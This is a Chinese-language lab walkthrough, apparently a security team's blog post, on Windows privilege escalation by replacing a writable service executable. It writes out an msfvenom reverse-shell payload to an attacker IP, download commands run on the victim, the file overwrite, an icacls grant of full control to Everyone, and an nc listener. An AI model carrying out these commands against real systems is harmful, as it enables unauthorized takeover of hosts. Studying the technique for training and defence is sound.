win提权第二弹服务提权

阅读须知：

0X01 windows服务

Windows 服务由服务控制管理器 (SCM) 管理。 SCM 是一个负责根据需要管理服务状态、检查任何给定服务的当前状态并通常提供配置服务的方法的进程。

其次我们可以知道windows 服务是 与 exe 可执行文件相关，同时 我们可以知道服务需要指定一个用户,因此我们能够想到什么 就是上次我们分享到 计划任务

如果我们能够也获得相应 exe 文件的修改权限我们是否可以根据这个权限，执行一个payload获取到相应服务指定用户的权限

0x02 靶场实践

查找 windows服务

首先找一找服务 选一个服务 看到了WindowsScheduler

我们可以看到 执行的二进制文件 C:\PROGRA_2\SYSTEM1\WService.exe

权限

看看权限

其实这个时候我们就可以看到 我们everyone组有读写权限 有权限就好办

payload

msfvenom -p windows/x/shell_reverse_tcp LHOST=10.11.69.232 LPORT=4444 -f exe-service -o 1.exe

生成一个 服务的二进制文件 可以直接连接的

载荷投递

kali 建立 http 服务

在受害机器中wget http://ip:8000/1.exe -O rev-svc.exe

应该是wget 可以在 powershell中使用不过这是个安装了wget

正常应该是使用

Invoke-WebRequest -Uri “https://10.11.69.232/1.exe” -OutFile"1.exe"

修改替换

此时我们正常会想到什么? 那肯定是利用我们的权限然后直接覆盖掉服务的 exe文件

直接 找到 \PROGRA_2\SYSTEM1

又试了 shell
Move-Item -Path “C:\Users\thm-unpriv\1.exe” -Destination “C:\PROGRA_2\SYSTEM1\WService.exe” 完美解决 直接将我们的 1.exe 换成了

此时查看权限我们应该是由 完整的拥有这个文件的所有权限

但是此时我们不仅是要看我们有这个权限我们还要看 我们要运行的服务的目标账户有没有权限

要把权限 给足 直接就是 icacls 服务 /grant Everyone:F

get shell

直接nc -lvp 4444

启动服务连接

同时感兴趣的小伙伴可以多多关注我们团队哦!!!